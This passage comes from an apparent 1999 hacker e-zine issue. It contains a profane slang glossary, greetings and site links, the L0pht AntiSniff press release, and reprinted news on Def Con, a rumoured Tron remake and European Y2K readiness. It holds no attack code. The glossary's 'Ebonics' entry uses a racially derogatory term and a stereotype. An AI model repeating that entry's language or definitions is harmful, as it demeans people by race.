  665.              an =/= (equals sign with a slash thru it) also means !=, =< is Equal
  666.              to or less than and =>  is equal to or greater than (etc, this aint
  667.              fucking grade school, cripes, don't believe I just typed all that..)
  668.  
  669.     AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
  670.  
  671.     AOL    - A great deal of people that got ripped off for net access by a huge
  672.              clueless isp with sekurity that you can drive buses through, we're
  673.              not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
  674.              least they could try leasing one??
  675.  
  676.    *CC     - 1 - Credit Card (as in phraud)
  677.              2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
  678.  
  679.     CCC    - Chaos Computer Club (Germany)
  680.  
  681.    *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
  682.              ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
  683.              watch videos and seminars, get drunk, listen to speakers, and last but
  684.              not least, get drunk.
  685.    *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
  686.                  speak he's the guy that breaks into systems and is often (but by no
  687.                  means always) a "script kiddie" see pheer
  688.               2 . An edible biscuit usually crappy tasting without a nice dip, I like
  689.                   jalapeno pepper dip or chives sour cream and onion, yum - Ed
  690.  
  691.     Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
  692.               Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
  693.               ebonics, speaking in a dark tongue ... being ereet, see pheer
  694.  
  695.     EoC    - End of Commentary
  696.  
  697.     EoA    - End of Article or more commonly @HWA
  698.  
  699.     EoF    - End of file
  700.  
  701.     EoD    - End of diatribe (AOL'ers: look it up)
  702.  
  703.     FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
  704.             usually in general media articles not high brow articles such as ours or other
  705.             HNN affiliates ;)
  706.  
  707.     du0d   - a small furry animal that scurries over keyboards causing people to type
  708.              weird crap on irc, hence when someone says something stupid or off topic
  709.              'du0d wtf are you talkin about' may be used.
  710.  
  711.    *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
  712.  
  713.    *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
  714.             define, I think it is best defined as pop culture's view on The Hacker ala
  715.             movies such as well erhm "Hackers" and The Net etc... usually used by "real"
  716.             hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
  717.             some coffee?' or can you hax0r some bread on the way to the table please?'
  718.  
  719.             2 - A tool for cutting sheet metal.
  720.  
  721.     HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
  722.              time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
  723.              noun means the hackernews site proper. k? k. ;&
  724.  
  725.     HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
  726.  
  727.     J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d
  728.  
  729.     MFI/MOI- Missing on/from IRC
  730.  
  731.     NFC   - Depends on context: No Further Comment or No Fucking Comment
  732.  
  733.     NFR   - Network Flight Recorder (Do a websearch) see 0wn3d
  734.  
  735.     NFW   - No fuckin'way
  736.  
  737.    *0WN3D - You are cracked and owned by an elite entity see pheer
  738.    *OFCS  - Oh for christ's sakes
  739.  
  740.     PHACV - And variations of same <coff>
  741.             Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
  742.  
  743.           Alternates: H - hacking, hacktivist
  744.                       C - Cracking <software>
  745.                       C - Cracking <systems hacking>
  746.                       V - Virus
  747.                       W - Warfare <cyberwarfare usually as in Jihad>
  748.                       A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
  749.                       P - Phreaking, "telephone hacking" PHone fREAKs ...
  750.                      CT - Cyber Terrorism
  751.  
  752.    *PHEER -  This is what you do when an ereet or elite person is in your presence
  753.             see 0wn3d
  754.  
  755.    *RTFM  - Read the fucking manual - not always applicable since some manuals are
  756.             pure shit but if the answer you seek is indeed in the manual then you
  757.             should have RTFM you dumb ass.
  758.  
  759.     TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0
  760.  
  761.     TBA   - To Be Arranged/To Be Announced also 2ba
  762.  
  763.     TFS   - Tough fucking shit.
  764.  
  765.    *w00t  - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
  766.             from the underground masses. also "w00ten" <sic>
  767.  
  768.             2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
  769.  
  770.     *wtf  - what the fuck, where the fuck, when the fuck etc ..
  771.  
  772.     *ZEN  - The state you reach when you *think* you know everything (but really don't)
  773.             usually shortly after reaching the ZEN like state something will break that
  774.             you just 'fixed' or tweaked.
  775.             
  776.      @HWA            
  777.      
  778.      
  779.                             -=-    :.    .:        -=-
  780.                             
  781.                             
  782.                             
  783.  
  784.  01.0 Greets!?!?! yeah greets! w0w huh. - Ed
  785.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  786.  
  787.      Thanks to all in the community for their support and interest but i'd
  788.      like to see more reader input, help me out here, whats good, what sucks
  789.      etc, not that I guarantee i'll take any notice mind you, but send in
  790.      your thoughts anyway.
  791.  
  792.  
  793.        * all the people who sent in cool emails and support
  794.        
  795.      FProphet       Pyra                TwstdPair      _NeM_
  796.      D----Y         Dicentra            vexxation      sAs72
  797.      Spikeman       p0lix  
  798.      
  799.      
  800.     
  801.      
  802.      Ken Williams/tattooman of PacketStorm, hang in there Ken...:(
  803.           
  804.      & Kevin Mitnick (watch yer back)                              
  805.      
  806.      kewl sites:
  807.  
  808.      + http://www.securityportal.com/ NEW
  809.      + http://www.securityfocus.com/ NEW
  810.      + http://www.hackcanada.com/
  811.      + http://www.l0pht.com/
  812.      + http://www.2600.com/
  813.      + http://www.freekevin.com/
  814.      + http://www.genocide2600.com/
  815.      + http://www.packetstorm.harvard.edu/    ******* DOWN ********* SEE AA.A
  816.      + http://www.hackernews.com/ (Went online same time we started issue 1!)
  817.      + http://www.net-security.org/
  818.      + http://www.slashdot.org/
  819.      + http://www.freshmeat.net/
  820.      + http://www.403-security.org/
  821.      + http://ech0.cjb.net/
  822.  
  823.      @HWA
  824.  
  825.  
  826.  01.1 Last minute stuff, rumours and newsbytes
  827.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  828.  
  829.        "What is popular isn't always right, and what is right isn't
  830.          always popular..."
  831.                            - FProphet '99
  832.                            
  833.        
  834.  
  835.     +++ When was the last time you backed up your important data?
  836.      
  837.      ++ AGENT STEAL INTERVIEW
  838.      
  839.         Justin Petersen tells CNN he now plans to begin a new life online, free of crime, with
  840.         an adult Web site. The interview airs on CNN Sunday and Monday at 8 p.m. ET and 10 p.m. PT. 
  841.         
  842.      ++ INFOWARCON'99
  843.        
  844.         by BHZ, Saturday 24th July 1999 on 10:26 pm CET
  845.         Infowar (www.infowar.com) announced this year's security gathering - InfowarCon '99.
  846.         It will be held in Washington from September 8th - 9th and: "Designed for
  847.         corporations, infrastructure firms, and finance, military, intelligence and law
  848.         enforcement organizations, InfowarCon '99 provides proven tactics for defending the
  849.         enterprise and infrastructures". 
  850.    
  851.         
  852.              
  853.      
  854.       Thanks to myself for providing the info from my wired news feed and others from whatever
  855.       sources, also to Spikeman for sending in past entries.... - Ed
  856.       
  857.      @HWA
  858.  
  859.  01.2 MAILBAG - email and posts from the message board worthy of a read
  860.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  861.     
  862.  
  863.  02.0 From the editor.
  864.       ~~~~~~~~~~~~~~~~
  865.  
  866.      #include <stdio.h>
  867.      #include <thoughts.h>
  868.      #include <backup.h>
  869.  
  870.      main()
  871.      {
  872.       printf ("Read commented source!\n\n");
  873.  
  874.      /*
  875.       * Nothing much to say, I have a summer cold, (gak!) here's
  876.       * issue #27... start reading. :)
  877.       * 
  878.       * hwa@press.usmc.net
  879.       *
  880.       */
  881.       printf ("EoF.\n");
  882.       }
  883.  
  884.       
  885.  
  886.       Congrats, thanks, articles, news submissions and kudos to us at the
  887.      main address: hwa@press.usmc.net complaints and all nastygrams and
  888.      mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
  889.      127.0.0.1, private mail to cruciphux@dok.org
  890.  
  891.      danke.
  892.  
  893.      C*:.
  894.      
  895.  03.0 l0pht releases AntiSniff - Press release
  896.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  897.             
  898.       For Immediate Release 
  899.  
  900.            L0pht Heavy Industries Releases a Public Beta of Its
  901.           Revolutionary New AntiSniff Network Security Software 
  902.  
  903.       Boston, MA - July 22, 1999 - L0pht Heavy Industries, a world
  904.       renowned computer security think tank, today announced the public
  905.       beta release of its AntiSniff network security software, which can
  906.       detect attackers surreptitiously monitoring a computer network. 
  907.  
  908.       "AntiSniff is a whole new breed of network security tool, designed to
  909.       detect the attack patterns used in compromising a computer
  910.       network, instead of merely being reactive to already known
  911.       vulnerabilities.", said Dr. Mudge, Chief Scientist at L0pht Heavy
  912.       Industries. 
  913.  
  914.       AntiSniff, which operates on both Windows NT and UNIX operating
  915.       systems, will detect remote computers that are packet sniffing, that
  916.       is, monitoring all network communications. 
  917.  
  918.       In a recent survey, three-quarters of U.S. corporations, government
  919.       agencies, financial institutions and universities reported suffering
  920.       financial losses due to computer security breaches. Some of these
  921.       attacks have become quite famous, such as the successfull attacks
  922.       against the Senate & FBI webservers. Other attacks, however, don't
  923.       get any media attention, and are far worse than the defacement of a
  924.       web site. These attacks involve the invasion of government and
  925.       corporate secrets, and personal privacy. Many of these attacks rely
  926.       on packet sniffing to penetrate deep into a computer network. 
  927.  
  928.       Network communication can be likened to large group of people
  929.       standing together in a room and talking. When people talk to each
  930.       other, others nearby have the ability to listen in. When computers
  931.       communicate over networks, they normally only listen to
  932.       communications destined to themselves. However, they also have
  933.       the ability to enter promiscous mode, which allows them to listen to
  934.       communications that are destined to other computers. 
  935.  
  936.       When an attacker successfully compromises a computer, they install
  937.       what is known as a packet sniffer, a tool that puts the computer into
  938.       promiscuous mode, thus allowing them to monitor and record all
  939.       network communications. The private information they gather, such
  940.       as account names, passwords, credit cards, and even e-mail, is then
  941.       used to compromise other computers. This is how, from one weak
  942.       computer in a computer network, many computers, and the
  943.       information they contain can be compromised. Until now, it has been
  944.       impossible for network administrators to remotely detect if computers
  945.       were listening in on all network communications. 
  946.  
  947.       L0pht Heavy Industries' AntiSniff stops all this, by giving network
  948.       administrators and information security professionals the ability to
  949.       remotely detect computers that are packet sniffing, regardless of the
  950.       operating system. Dr. Mudge explains, "AntiSniff works by running a
  951.       number of non-intrusive tests, in a variety of fashions, which can
  952.       determine whether or not a remote computer is listening in on all
  953.       network communications. Now it is impossible for an attacker who is
  954.       sniffing to hide." 
  955.  
  956.       Current network security tools, such as network scanners, work by
  957.       probing machines for software that contains bugs or software that's
  958.       misconfigured. Intrusion Detection Systems (IDS), work by finding
  959.       malicious signatures in network traffic. AntiSniff, on the other hand,
  960.       is the first of it's kind. It remotely detects the passive act of
  961.       eavesdropping on network communications. It will even detect
  962.       packet sniffers installed by a rogue insider who may have legitimate
  963.       administrative access to a machine, but still should not be monitoring
  964.       all network traffic. 
  965.  
  966.       The AntiSniff public beta is released for Windows NT, complete with a
  967.       fully featured graphical interface, report generating tools, and alarm
  968.       system. It is designed so that it can be used to quickly scan a
  969.       network or scan continuously, triggering alarms when a "packet
  970.       sniffing" machine is detected. 
  971.  
  972.       The beta version has been made available free to all who would like
  973.       to try it out. L0pht hopes to have the commercial release ready
  974.       within a few weeks. Retail and site license pricing have not yet been
  975.       determined. 
  976.  
  977.       To further the research of the security community as a whole, as
  978.       they have in previous products, L0pht will be releasing AntiSniff as a
  979.       UNIX command-line tool, complete with full source code. 
  980.  
  981.       For more information please contact AntiSniff@l0pht.com. The free
  982.       beta download and full documentation are available at
  983.       http://www.l0pht.com/antisniff/. 
  984.  
  985.       About L0pht Heavy Industries 
  986.  
  987.       L0pht Heavy Industries is a world renowned computer security think
  988.       tank. Founded in 1992 as a computer research facility, the L0pht has
  989.       grown into a leader in the field of computer security software. The
  990.       L0pht's products include L0phtCrack, the industry standard NT
  991.       password auditing tool. As a result of their innovative security
  992.       research, the L0pht has released dozens of computer security
  993.       advisories to the Internet community, warning of dangerous
  994.       vulnerabilities in today's most widely used software. Many at the
  995.       L0pht are considered top experts in the computer security field and
  996.       have appeared on numerous network news programs and
  997.       documentaries, as well as having testified about government
  998.       computer security for the U.S. Senate. Visit the L0pht's web site at
  999.       http://www.l0pht.com. 
  1000.  
  1001.       All trademarks and registered trademarks are the property of their
  1002.       respective holders. 
  1003.     
  1004.       @HWA
  1005.      
  1006.  
  1007. 04.0 Pixar to remake TRON?
  1008.      ~~~~~~~~~~~~~~~~~~~~~
  1009.          
  1010.       --------------------------------------------------------------
  1011.       This story was printed from ZDNN,
  1012.       located at http://www.zdnet.com/zdnn.
  1013.       --------------------------------------------------------------
  1014.       
  1015.       Pixar Studios to remake Disney's Tron?
  1016.       By Richard Barry, ZDNet (UK)
  1017.       July 23, 1999 4:13 PM PT
  1018.       URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2301037,00.html?chkpt=hpqs014
  1019.       
  1020.       It set the scene for a generation of hi-tech sci-fi movies and, arguably, inspired some of the best
  1021.       films of the genre. Tron, the legendary Disney movie loved by the thirty-something generation, is
  1022.       rumored to be in the re-make room with some very serious backers, including Steve Jobs. 
  1023.       
  1024.       Jobs, on stage this week with the iBook, also has another day job, running Pixar Animation
  1025.       Studios (Nasdaq:PIXR), maker of "Toy Story" and "A Bug's Life." According to one source,
  1026.       Pixar may be working on a remake of the classic '80s sci-fi film. 
  1027.       
  1028.       The source, who asked not to be identified, said Pixar is trying to decide whether to remake the
  1029.       original or create a sequel. It will begin work on the project once Toy Story II hits the theaters
  1030.       November 24. John Lasseter, Toy Story's director, will head the production. 
  1031.       
  1032.       Lending fuel to the rumor, Lasseter has gone on record crediting Tron as the driving inspiration
  1033.       behind Toy Story. He saw the film while working as an animator on Mickey's Christmas Carol
  1034.       and had two best friends on the production team. 
  1035.       
  1036.       "It [Tron] was the future. It was the potential I saw in computer animation," Lasseter said. 
  1037.       
  1038.       A spokesperson for Pixar in Richmond, Calif., said she was not aware of any Tron projects, but if
  1039.       it were to happen, it would likely be led by Disney. Disney owns 50 percent of Pixar. The
  1040.       company did not return calls by press time. 
  1041.  
  1042.       @HWA
  1043.  
  1044. 05.0 Meet the fed (zdtv:Defcon)
  1045.      ~~~~~~~~~~~~~~~~~~~~~~~~~~
  1046.      
  1047.      http://www.zdnet.com/zdtv/cybercrime/features/story/0,3700,2293749,00.html
  1048.      
  1049.  
  1050.       Phil Loranger, division chief for information assurance with the US
  1051.       Army, speaks out about Def Con 
  1052.  
  1053.       Phil Loranger, the division chief for information assurance with the US Army,
  1054.       was interviewed by CyberCrime analyst Alex Wellen while at Def Con. Here are
  1055.       excerpts. 
  1056.  
  1057.       Why come to Def Con? "This is an important conference to anybody [who] attends. 
  1058.       It is a conference in which there is a lot of valuable and technical information
  1059.       exchanged. 
  1060.  
  1061.  
  1062.       "There is an opportunity to meet some of the folks on the dark side, if you will,
  1063.       to see some of their thinking. 
  1064.  
  1065.       "We've done this [for the] first time this year to put [on] a federal panel and get
  1066.       [a] frank and honest exchange. ... To get some feelings from what the industry
  1067.       considers to be some of the most elite people in the dark side of computer
  1068.       security, if you will. 
  1069.  
  1070.       "We were invited to do a presentation and to participate in a panel." 
  1071.  
  1072.       Do you use hackers to check out your systems, to verify your vulnerablities?
  1073.       "Hackers, by their very definition, are law breakers and criminals, and I don't see
  1074.       why they should be rewarded, especially using taxpayer dollars. 
  1075.  
  1076.       "We have very talented people who have never broken the law and have struggled
  1077.       very hard through [their] academic years; and those are the folks we want to bring
  1078.       onto the payroll. 
  1079.  
  1080.       "This is not to say that the people we are addressing here today at this conference
  1081.       are criminals. We are talking here in broad strokes saying that if you break into a
  1082.       system you're a criminal." 
  1083.  
  1084.       How have you been received by attendees?
  1085.       "I have been experiencing a very cordial interchange among the people we've met.
  1086.       Meet the [Fed] panel was a less regulated environment, if you will. I think that it was
  1087.       not as rowdy as I had imagined, and I was pleased about that. 
  1088.  
  1089.       "Isn't it wonderful that we're able to have conferences like this under our form of
  1090.       government that says it's OK to not agree with the people on the platform?" 
  1091.  
  1092.       Will you return to Def Con next year?
  1093.       "I see us reacting to invitations to these if there are more, absolutely. 
  1094.  
  1095.  
  1096.       "Where else can you come and have a member of the  White House National Security Counsel,
  1097.       a member of the Office of the Secretary of Defense for Investigation, and a member of the
  1098.       military department stand there and interface with what I guess is considered
  1099.       ... we're considered to be their targets
  1100.       and so forth."     
  1101.       
  1102.       @HWA
  1103.       
  1104. 06.0 Poulsen at DefCon
  1105.      ~~~~~~~~~~~~~~~~~
  1106.      
  1107.      My First Def Con
  1108.  
  1109.       On finding decadence and dialogue in
  1110.       the desert
  1111.       By Kevin Poulsen  July 14, 1999 
  1112.  
  1113.       I'm wandering through the hall outside the main conference room at the Alexis Park
  1114.       Hotel, stepping gingerly over blue Ethernet cable while gripping a drink in
  1115.       one hand, a cigarette in the other. Las Vegas is a nexus of many vices, crammed
  1116.       into spurts of late-night binges and hangover mornings. 
  1117.  
  1118.       Last weekend it became an oasis of decadence and dialogue in a desert turned
  1119.       to mud by a freak thunderstorm. 
  1120.  
  1121.       It's the seventh annual Def Con, the computer underground convention: my first. 
  1122.       Around me, a chaotic bazaar shows hackers of all shapes and sizes crowding
  1123.       around tables stacked with underground publication, T-shirts, and chunks of
  1124.       technology begging to be taken apart and reassembled. The younger attendees are
  1125.       drowning in caffeinated drinks-- primarily Jolt cola, which was apparently stocked
  1126.       by the hotel especially for this occasion. 
  1127.  
  1128.       "How is publicly releasing a hacking tool different from giving out guns to children?"
  1129.       queries the voice behind the camera, aimed for a kill shot at my head. 
  1130.  
  1131.       Earlier in the day, The Cult of the Dead Cow made a flashy standing-room-only
  1132.       presentation of Back Orifice 2000 -- a  feature-packed but stealthy
  1133.       remote-control utility for Windows-- and  it's fast becoming a symbol for the
  1134.       conference. 
  1135.  
  1136.       I don't know how to answer a question comparing a computer program to a
  1137.       firearm, but when the voice rephrases, I offer my soundbite. 
  1138.  
  1139.       "Secrecy only helps the bad guys." 
  1140.  
  1141.       By my definition, everyone at Def Con is a good guy, except the handful of good
  1142.       gals. The thousands of hackers, security consultants, outlaws, and scenesters from
  1143.       around the world are laying bare their knowledge, and sometimes their flesh, to
  1144.       each other and to the roving (and steadily increasing) glass eyes of news
  1145.       organizations that they suspect just don't get it. 
  1146.  
  1147.       Even the cops tend towards openness, good-naturedly accepting their "I Am the
  1148.       Fed" T-shirts when sharp-eyed hackers pick them from the crowd.
  1149.       
  1150.       The Primo Stuff
  1151.  
  1152.       The Dead Cow was the star of the show, but other highlights included the premiere
  1153.       of a nine-minute teaser for Freedom Downtime, 2600 editor Emmanuel
  1154.       Goldstein's work-in-progress about the legal travails of imprisoned hacker Kevin
  1155.       Mitnick. 
  1156.  
  1157.       After seeing the trailer, Chaos Theory foresees Goldstein and his documentary
  1158.       appearing at Cannes. You heard it here first. 
  1159.  
  1160.       Austin Hill, president of Zero Knowledge Systems Inc., described the workings of his
  1161.       company's  much-anticipated Freedom Net, an elaborate system intended to cloak the
  1162.       online activities of privacy conscious netizens. 
  1163.  
  1164.       Hill wins my Golden Aphorism award (which I just invented) for his answer to law
  1165.       enforcement's complaints that Internet anonymity makes their job harder:
  1166.       "Policing is only easy in a police state." 
  1167.  
  1168.       Sessions at the conference covered public policy, tutorials on computer security and
  1169.       lock-picking, a plethora of technical discussions, and games, such as Hacker
  1170.       Jeopardy and a social engineering contest. 
  1171.  
  1172.       At night, hackers raved on the conference dance floor and partied in the suites. 
  1173.  
  1174.       And it's there, away from the rows of  Linux boxes and laptops, and beyond the
  1175.       reach of the blue cables, that the  excesses of the Def Con nightlife evoke a
  1176.       Hollywood party, circa 1985. Reclining next to the hot tub at a shindig in one of
  1177.       the more spacious suites-- a vice, once again, in each hand-- someone offers me
  1178.       a tiny Ziplock bag filled with white powder. 
  1179.  
  1180.       The illusion is dispelled when I read the warning label affixed to the bag. The
  1181.       powder is 100 percent pure caffeine. Primo stuff at the hacker con. 
  1182.  
  1183.       Editor's Note: Kevin Poulsen was a
  1184.       speaker at Def Con, and was on the team
  1185.       that won Hacker Jeopardy, which also
  1186.       included Jennifer Granick and Mark Lottor.
  1187.  
  1188.  
  1189.       @HWA
  1190.       
  1191. 07.0 Y2K Situation in Europe
  1192.      ~~~~~~~~~~~~~~~~~~~~~~~
  1193.      
  1194.      From http://www.net-security.org/
  1195.      
  1196.      by BHZ, Friday 23rd July 1999 on 1:17 pm CET
  1197.      German Council of Trade and Industry published results of their testing about Y2K
  1198.      compliance in German companies. It looks like just 45 percent of companies are
  1199.      properly prepared for the new millennium. According to some IT professionals, year
  1200.      2000 will be a year of bankruptcies. Western European countries are prepared for
  1201.      Y2K, but there is always something to work around. Read the story on NY Times.  
  1202.      
  1203.      July 23, 1999
  1204.  
  1205.  
  1206.      Europe Rides Bumpy Computer Road to
  1207.      Year 2000
  1208.  
  1209.      By EDMUND L. ANDREWS
  1210.  
  1211.       HANOVER, Germany -- Perhaps fittingly, Germany's first real
  1212.      scare about Year 2000 computer crashes came on a Friday the 13th. 
  1213.  
  1214.      It was March 1998, and most people here were greeting warnings about
  1215.      Year 2000 failures with a lack of interest. It seemed like a trivial
  1216.      problem, a matter of making sure that computer clocks would not
  1217.      misread the year 2000 as 1900. 
  1218.  
  1219.      Then came the test at the Hanover city power company, organized by a
  1220.      confident data processing manager in the spirit of public education, with
  1221.      local media invited to watch. At first, everything seemed fine. But within a
  1222.      few minutes after "midnight," the computer began spewing out thousands
  1223.      of error messages. Then it froze up entirely, and the monitors went blank.
  1224.  
  1225.  
  1226.                                 Hanover did not go dark. But for a
  1227.                                 few minutes, it was impossible to
  1228.                                 monitor the electric grid or to trace
  1229.                                 equipment breakdowns. It took
  1230.                                 seven months to eradicate all the
  1231.                                 problems. 
  1232.  
  1233.                                 "I really thought it would be fine," said
  1234.      Juergen Rehmer, the blue-jeans-clad manager who arranged the event.
  1235.      "We had made a lot of changes already, and I was quite certain that a
  1236.      full-system test wouldn't present any great difficulty." 
  1237.  
  1238.      Rehmer's test was a watershed. It disrupted a widespread complacency
  1239.      about Year 2000 problems, and marked the first time that a German
  1240.      power company had issued a warning. 
  1241.  
  1242.      At the time it occurred, the German government had yet to make its first
  1243.      assessment of the Year 2000 problem. Surveys by insurance companies
  1244.      showed that the vast majority of companies had not even begun to look
  1245.      at their systems. 
  1246.  
  1247.      "The European view is that Anglo-American countries
  1248.      are in kind of an hysterical mold," said Peter Eibert,
  1249.      the Year 2000 coordinator at Ford Motor Co. of
  1250.      Europe, based in Cologne. 
  1251.  
  1252.      Germany and many of Europe's most advanced
  1253.      countries are racing to make up for lost time.
  1254.      Corporations are pouring billions of dollars into
  1255.      reprogramming computers. Government agencies
  1256.      have set up hot lines. Industry associations hold
  1257.      countless conferences, often invoking the image of
  1258.      ticking time bomb. 
  1259.  
  1260.      They are making headway. Most experts are
  1261.      increasingly confident that Europe is not likely to see
  1262.      catastrophic failures. A Year 2000 trial involving
  1263.      Europe's major banks went smoothly. Airlines and
  1264.      airports, which recognized the danger long ago, say they are ready. 
  1265.  
  1266.      Nevertheless, many smaller companies and public institutions are running
  1267.      out of time. 
  1268.  
  1269.      In a recent survey, the German Council of Trade and Industry found that
  1270.      only 45 percent of companies were properly prepared. Hermes, a
  1271.      German insurance company in Hamburg, estimates that 60 percent of
  1272.      German companies still hadn't started a comprehensive program by last
  1273.      fall. 
  1274.  
  1275.      "We believe there will be a substantially higher rate of bankruptcies in the
  1276.      year 2000," said Walter Schmitt-Jamin, a managing director of Hermes.
  1277.      A doubling of the usual bankruptcy rate, slightly less than one percent of
  1278.      companies each year, is entirely possible, he added. 
  1279.  
  1280.      The readiness varies considerably across Western Europe. In Britain, the
  1281.      Netherlands and much of Scandinavia, governments and corporations
  1282.      jumped on the problem two years ago. 
  1283.  
  1284.      In Germany and France, government and business leaders were until
  1285.      recently more lackadaisical. Poorer countries like Italy, Spain and
  1286.      Portugal are struggling. 
  1287.  
  1288.      The formerly Communist nations of Central Europe and Russia are much
  1289.      more seriously behind. LOT, the Polish national airline, announced
  1290.      recently that it will ground about 70 flights on New Year's Eve out of
  1291.      concern about Year 2000 breakdowns. The Russian government
  1292.      recently reported that only one-third of the country's banks were ready. 
  1293.  
  1294.      Western European countries are well prepared in comparison. But they
  1295.      also have more to worry about. 
  1296.  
  1297.      The 15 nations of the European Union, 11 of which have now adopted
  1298.      the euro as a single currency, is an increasingly unified economy linked by
  1299.      dense information networks. 
  1300.  
  1301.      There is a boom in the construction of cross-border fiber-optic
  1302.      networks. Power companies buy and sell electricity over electronic
  1303.      trading systems. Car manufacturers order from suppliers over computer
  1304.      networks. 
  1305.  
  1306.      Yet when car manufacturers sent the worldwide suppliers detailed Year
  1307.      2000 questionnaires in early 1997, most of the responses provided little
  1308.      in the way of useful information. 
  1309.  
  1310.      That became a source of growing anxiety here in Germany over the next
  1311.      year. Executives at General Motors' Opel subsidiary were startled to
  1312.      discover that industrial robots they bought in 1997 still had Year 2000
  1313.      glitches. By August 1998, Opel had decided to start sending its own
  1314.      Year 2000 assessors on personal visits to key suppliers. 
  1315.  
  1316.      "The key was to ask questions that indicated whether the suppliers knew
  1317.      what they were talking about," said Roger Aze, Opel's Year 2000
  1318.      coordinator. "Do you have a person in charge of Y2K? Do you have a
  1319.      program and a schedule?" 
  1320.  
  1321.      In the last several months, Opel started sending technical experts to its
  1322.      most critical suppliers -- the ones whose own assembly lines are linked
  1323.      directly by computer network to those of Opel and that deliver on a "just
  1324.      in time" basis. 
  1325.  
  1326.      But Aze is still bracing for things outside their control: power disruptions
  1327.      or problems further down the supply chains. 
  1328.  
  1329.      Power remains one of the biggest concerns. "The energy industry had
  1330.      overslept," Rehmer said bluntly. It wasn't until July 1998 -- four months
  1331.      after Hanover's surprising test failure -- that the German Association of
  1332.      Electric Utilities advised members to "Start now!" on Year 2000
  1333.      preparation. 
  1334.  
  1335.      Today, Year 2000 experts in Germany say severe disruptions are
  1336.      unlikely but cannot be ruled out. As a result, many big industrial
  1337.      manufacturers are scaling back production to insulate themselves for a
  1338.      shock of an abrupt power disruption. 
  1339.  
  1340.      BASF AG, the chemical conglomerate based in Ludwigshafen, has
  1341.      decided to shut a number of its systems on New Year's Eve so it can get
  1342.      by on the electricity from its own on-site power plant. 
  1343.  
  1344.      So many manufacturers are reducing their power consumption on New
  1345.      Year's Eve that the utility industry has begun to worry about disruptions
  1346.      caused by an abrupt plunge in demand. 
  1347.  
  1348.      One of the key differences between European countries on Year 2000
  1349.      issues is the degree to which governments became involved. 
  1350.  
  1351.      In Britain, Prime Minister Tony Blair has built up a huge program to
  1352.      promote awareness and point companies toward solutions. Besides
  1353.      drumming up publicity, the government fielded several thousand "bug
  1354.      busters" to get out the word. 
  1355.  
  1356.      The Netherlands started a similar program, known as the Dutch
  1357.      Millennium Platform, headed by Jan Timmer, the former chairman of
  1358.      Philips Electronics NV. Timmer irked business groups by exhorting them
  1359.      to act, but most now experts rank the Netherlands alongside the United
  1360.      States and Britain as among the best-prepared countries. 
  1361.  
  1362.      By contrast, German leaders did not show much interest in the subject
  1363.      until a few months ago. The government issued a tepid report one year
  1364.      ago and a more thorough one this spring, and it only recently set up an
  1365.      Internet site devoted to the issue. 
  1366.  
  1367.      Local governments have largely been quiet on the matter. In March, the
  1368.      German weekly news magazine Focus published a survey indicating that
  1369.      most German cities had not yet prepared themselves for problems.
  1370.      According to the survey, carried out with the German Conference of
  1371.      Cities, half the cities had yet to test their hospitals, and one-third had not
  1372.      tested their mass transit systems. 
  1373.  
  1374.      The hospitals have had a rude awakening. Andreas Tecklenberg, director
  1375.      of a 260-bed hospital in the north German town of Eutin, was dismayed
  1376.      when only six out of 150 manufacturers gave him useful answers when he
  1377.      sent them queries about Year 2000 problems. 
  1378.  
  1379.      Since then, he has started to get better information. At the moment, he
  1380.      estimates, about one-third of the hospital's systems are "green" or ready;
  1381.      about one-third are yellow, and one-third still red. 
  1382.  
  1383.      "The devices will have to be watched," Tecklenberg said. "But
  1384.      fortunately, we can have people take over if equipment goes wrong." 
  1385.  
  1386.      At the German Heart Center in Berlin, which specializes in heart surgery,
  1387.      administrators are avoiding elective surgery between Christmas and
  1388.      January 3. It has also imposed a ban on holidays for most of the medical
  1389.      and technical staff on New Year's Eve. 
  1390.  
  1391.      "If you look at this from the American standpoint, we all started late
  1392.      here," acknowledged Marcus Werner, who coordinates the center's
  1393.      Year 2000 planning. 
  1394.  
  1395.      Werner started his preparations in October and said he was now
  1396.      reasonably confident about the hospital's medical equipment. 
  1397.  
  1398.      But like so many others, he worries about power. The hospital shares a
  1399.      back-up generator with the University of Berlin, but he is still worried
  1400.      about the software that will have to ration the relatively scarce electricity. 
  1401.  
  1402.      "What it comes down to is things you basically have no control over," he
  1403.      said. 
  1404.  
  1405.      @HWA
  1406.      
  1407. 08.0 Applied Maximum Internet Security
  1408.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  1409.      
  1410.      From http://www.net-security.org/
  1411.      
  1412.      by BHZ, Friday 23rd July 1999 on 1:09 pm CET
  1413.      Applied Maximum Internet Security, 3 day computer security seminar will be held in
  1414.      Cardiff By The Sea (California) on August 16-18, 1999 and September 27-29, 1999.
  1415.      ex-underground based instructors will cover the topics from essentials of TCP/IP, over
  1416.      the usual hacking/cracking tools to attack strategies. The fee is $1,395 for 3 days. 
  1417.  
  1418.      @HWA 
  1419.      
  1420. 09.0 HPSBUX9907-100 CDE Leaves Current Directory in root PATH
